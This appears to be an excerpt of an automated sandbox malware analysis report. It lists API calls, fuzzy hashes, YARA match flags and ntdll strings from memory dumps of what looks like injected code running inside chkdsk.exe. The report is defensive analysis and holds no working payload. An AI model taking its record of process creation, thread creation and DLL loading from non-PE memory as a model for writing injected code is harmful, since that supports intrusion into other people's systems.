                                                      • Opcode Fuzzy Hash: 27cc4ac8af34ea21c69b4d0e7073fdd397a4a5683a00f57dd03264e858539acb
                                                      • Instruction Fuzzy Hash: 033110B5A006099FDB10DFD8C8809EEB7B9FF88304B108559E916A7214DB75AE05CBA0
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00763C52
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
                                                      • Instruction ID: 3616b8911fc93776df64c5f28213f2d6b994ab722df06a88b3c106d2c3023940
                                                      • Opcode Fuzzy Hash: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
                                                      • Instruction Fuzzy Hash: 3F014CB5D0020DBBDF10DAA0DC46F9DB3B89B54308F0081A5E91DA7281F635EB54CBA2
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(007606E1,00760709,007604E1,00000000,007674A3,00000010,00760709,?,?,00000044,00760709,00000010,007674A3,00000000,007604E1,00760709), ref: 00777B60
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: fba9c78066fb86d9f91f51c3de77d0f2a62298edbe6becbb889d3f07a3a84429
                                                      • Instruction ID: 779b2f50846458ccb0febb4e91bc2859e49e45c16c68cf783996aab3dd0bb559
                                                      • Opcode Fuzzy Hash: fba9c78066fb86d9f91f51c3de77d0f2a62298edbe6becbb889d3f07a3a84429
                                                      • Instruction Fuzzy Hash: 9901D6B2204108BBCB44DE89DC81EEB77ADAF8C754F408108BA0DE3240D630F8518BA4
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0076750C
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 0b15cb72b24f5e271675e8c2dc2b7ab85076c8575cf3a05a3f02fb29d32ac1da
                                                      • Instruction ID: 634d07341a5cd968526d7ba379cf11758cacb09fbaea2418261d011b20ed8615
                                                      • Opcode Fuzzy Hash: 0b15cb72b24f5e271675e8c2dc2b7ab85076c8575cf3a05a3f02fb29d32ac1da
                                                      • Instruction Fuzzy Hash: 96F04C6164868497DF2B12388C167E63B180F03359F3C49A4F987DB8C7E628D826C294
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759305
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: c07eec7fca1468d05d1c170caf4222add6f24925edd0f0dce4a231747551d0e5
                                                      • Instruction ID: b7ff486d2758d1f78f2c09ee033421c7f5b0a2b9c365256159f3ba15ebe19a93
                                                      • Opcode Fuzzy Hash: c07eec7fca1468d05d1c170caf4222add6f24925edd0f0dce4a231747551d0e5
                                                      • Instruction Fuzzy Hash: 0FF06573380204BAE62065A99C03FD7769C9B847A2F154426FB0DEB1C1D595B40142E5
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759305
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 0e6facdd21fb09dacd1459298f00ccc7c7a0e5d5e8a0fbfedfd4b58723e37bba
                                                      • Instruction ID: 0af802bb191ba4b258fc77e0117dbad932593c9e15db206f8c369ff39f689391
                                                      • Opcode Fuzzy Hash: 0e6facdd21fb09dacd1459298f00ccc7c7a0e5d5e8a0fbfedfd4b58723e37bba
                                                      • Instruction Fuzzy Hash: 86F02B72280244B9E73062A89C03FDB779C8F80791F204119F70DEB1C1C5D6740246E4
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,787DA667,00000007,00000000,00000004,00000000,007634C3,000000F4,?,?,?,?,?), ref: 00777AAF
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
                                                      • Instruction ID: 6322f180748aa9e32c0557d61f116c132b57e871b6307ffff6f06fe1e2ba4d48
                                                      • Opcode Fuzzy Hash: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
                                                      • Instruction Fuzzy Hash: 6CE06D71200304BFD614EE58DC49FAB37ADEF89711F004408F909A7241DA70B81087F5
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0076750C
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 011410a5f2eb924cfff189fc5ba29a09c652b7c2c06128ec5833352805b48186
                                                      • Instruction ID: e2d6347793931b16aa4e57b78e3d9dd59a06bd9eba58c001f55418db9f92678c
                                                      • Opcode Fuzzy Hash: 011410a5f2eb924cfff189fc5ba29a09c652b7c2c06128ec5833352805b48186
                                                      • Instruction Fuzzy Hash: 51E0807124430857FB246678DC45F6633584744769F5949A0FD1FDB5C3E57CF911C150
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00761130,dw,00773DC7,?), ref: 00767323
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 6324c3716770a43747702c452d78498f71c6a11b53caf19468caabd63fb3781a
                                                      • Instruction ID: 5f727f90f220241a84cba06710d898e52dd65686249f96a211bebf9d7b2c382f
                                                      • Opcode Fuzzy Hash: 6324c3716770a43747702c452d78498f71c6a11b53caf19468caabd63fb3781a
                                                      • Instruction Fuzzy Hash: 19E086716842447EFB10E2B49C47FF52F559B84344F4580BCB848D7283E855A50186A0
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00761130,dw,00773DC7,?), ref: 00767323
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 48fc90a61e18b2f1077fd252f05b303faf41566d1f6743137865446243a301f2
                                                      • Instruction ID: b09f055764498ed80f9faba80b354b9015819e7fa2c5f27466d43fe450742c4b
                                                      • Opcode Fuzzy Hash: 48fc90a61e18b2f1077fd252f05b303faf41566d1f6743137865446243a301f2
                                                      • Instruction Fuzzy Hash: DCD05EB17803087BFA00E6B5DC47F66368C9B44795F868078BD0CE76C3E969F50086E5
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d20d8256080868549fdff66a3feb425552a267e498bbc7698aae12b4ce466b48
                                                      • Instruction ID: 0befa8ec423e3a838d288e1b687c676167472ec9d86475795cb4f66aab4fce00
                                                      • Opcode Fuzzy Hash: d20d8256080868549fdff66a3feb425552a267e498bbc7698aae12b4ce466b48
                                                      • Instruction Fuzzy Hash: 4BB09B729065D5C5DB11F7604609B57792177D0701F55C063E3074752E4778C1D1F175
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05277d6522010f49c34dfb13a0f287429e1780aaa73adc7c2ec3e775ec93a475
                                                      • Instruction ID: e606acae039b21ee761fd03c782cb7e36312d4ca1eeec3957f4600092f751937
                                                      • Opcode Fuzzy Hash: 05277d6522010f49c34dfb13a0f287429e1780aaa73adc7c2ec3e775ec93a475
                                                      • Instruction Fuzzy Hash: F7C08C23A2720002E926580DB4903F6EB68E793132D8866ABDC8BBB202C182D45102DE
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adfa8824ba12893573f24bbddba9d89d974079982f410c7c31f310173d234243
                                                      • Instruction ID: de9dbf575066db9d4e445d591fd9d23a1e3af454c317aaa6cfe53130fd53da5c
                                                      • Opcode Fuzzy Hash: adfa8824ba12893573f24bbddba9d89d974079982f410c7c31f310173d234243
                                                      • Instruction Fuzzy Hash: B6B09213B042480161286C8A78800B8F7A0D6C3232E5823BAEA4CA30404043C914429C
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: c7fd2a2f1425dae3e71c66eccb227184f2a6eba7bd1385a78e9c2738d3f1c1f2
                                                      • Instruction ID: 8781d639847853c9edead90b55ae8a66d5005a81a0885a43548eca5122e2ccb8
                                                      • Opcode Fuzzy Hash: c7fd2a2f1425dae3e71c66eccb227184f2a6eba7bd1385a78e9c2738d3f1c1f2
                                                      • Instruction Fuzzy Hash: 2251DAB6B081367FCB20DB598990AFFF7B9BB09201794836BE455D7641E274DE408BA0
                                                      Strings
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 05454787
                                                      • Execute=1, xrefs: 05454713
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05454655
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05454725
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05454742
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 054546FC
                                                      • ExecuteOptions, xrefs: 054546A0
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 5feca1e9099daaf8c708cf9a2da1360e1c29409eb112567e52650ffcaf3ca7c5
                                                      • Instruction ID: 49b53077558c1e05de174637057b7ba6cb4cffab055a063a63fd45b26eded3e6
                                                      • Opcode Fuzzy Hash: 5feca1e9099daaf8c708cf9a2da1360e1c29409eb112567e52650ffcaf3ca7c5
                                                      • Instruction Fuzzy Hash: D051E7316402197ADF14EAA5EC99FEA77A9FF04320F0400DFE905AB281DB71AE45CF55
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 49110d8325f2545f4fb3f100ea3c26c03523ec41d0a3ba68e52e8196f95e76a2
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: A281B230E052799EDF24CE68C8517FEBBA2FF85310F98819BD8A1A7391C7349841CB51
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054502E7
                                                      • RTL: Re-Waiting, xrefs: 0545031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054502BD
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: a55eeb6fbe93bd780840e1587d3592dcb004a8e29fc6401e5afb2bcde13d3120
                                                      • Instruction ID: 9a3312461724511842ce46db3258b09e9582d5fb1e4fa9e77027c5d0b1b602a9
                                                      • Opcode Fuzzy Hash: a55eeb6fbe93bd780840e1587d3592dcb004a8e29fc6401e5afb2bcde13d3120
                                                      • Instruction Fuzzy Hash: A9E1B235608741AFD724CF28C848BAAB7E1BB84324F240A7EF995873D1D774E949CB52
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 05457BAC
                                                      • RTL: Resource at %p, xrefs: 05457B8E
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05457B7F
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: de8b951505adfb9f73734d6e60fc9d1e11772c3b9115ace16589f70860da155a
                                                      • Instruction ID: f856a4577a4c84c905a6ca542c385a027bbe9ff861a3ec6545b42ed2949e2fea
                                                      • Opcode Fuzzy Hash: de8b951505adfb9f73734d6e60fc9d1e11772c3b9115ace16589f70860da155a
                                                      • Instruction Fuzzy Hash: 6D41BF317047029BC724CE26D844BABB7E6FB88720F000A6EE956DB781DB71E8058B95
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0545728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 054572C1
                                                      • RTL: Resource at %p, xrefs: 054572A3
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05457294
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 3124a94676c81cb7d9317096d291891abe001f8ccb44e32011e17d164d6e480e
                                                      • Instruction ID: f969be6ebf6bc33963b96d2385cd21a1e59e78cdadb307311399edfd31b9a547
                                                      • Opcode Fuzzy Hash: 3124a94676c81cb7d9317096d291891abe001f8ccb44e32011e17d164d6e480e
                                                      • Instruction Fuzzy Hash: DF41EF31704216ABC724CE26CC41FAAB7A6FB84760F10462EFC55EB741DB31E8069BD5
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: eb156fbc43944c0de6982911a4226b57fd1182f81a42db898c8ebfa615c6e78c
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 0C91B070E082369BDB24DE69C881AFFB7A2FF44320F95459BE855E73C4E73099428761
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: adad2d82675d251ac7374a0406bb2bd0fae4d0239366563f2ec11d4ca7eab52b
                                                      • Instruction ID: fd90e6f59480a9d3d2aaa6c6e40596917001a7bbbf08ee0f537743dfb2efec7b
                                                      • Opcode Fuzzy Hash: adad2d82675d251ac7374a0406bb2bd0fae4d0239366563f2ec11d4ca7eab52b
                                                      • Instruction Fuzzy Hash: FF812A76D04269DBDB25DB54CC49BEEB7B9AF08750F0041EAE919B7280D7709E84CFA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0546CFBD
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4_w@4_w
                                                      • API String ID: 4062629308-713214301
                                                      • Opcode ID: 8c0c0d5b85cca0b72cadc8aedf286047e94bbf0d46b3484d418c6bbec1278516
                                                      • Instruction ID: b252699b81bbcf6ce4b78f3e0d174640a543c4c5612001150a5dee2dbdc7519f
                                                      • Opcode Fuzzy Hash: 8c0c0d5b85cca0b72cadc8aedf286047e94bbf0d46b3484d418c6bbec1278516
                                                      • Instruction Fuzzy Hash: 09419B71E00228DFCB25DFA5C984AEEBBB8FF45B14F10446BE905DB254D7748901DB62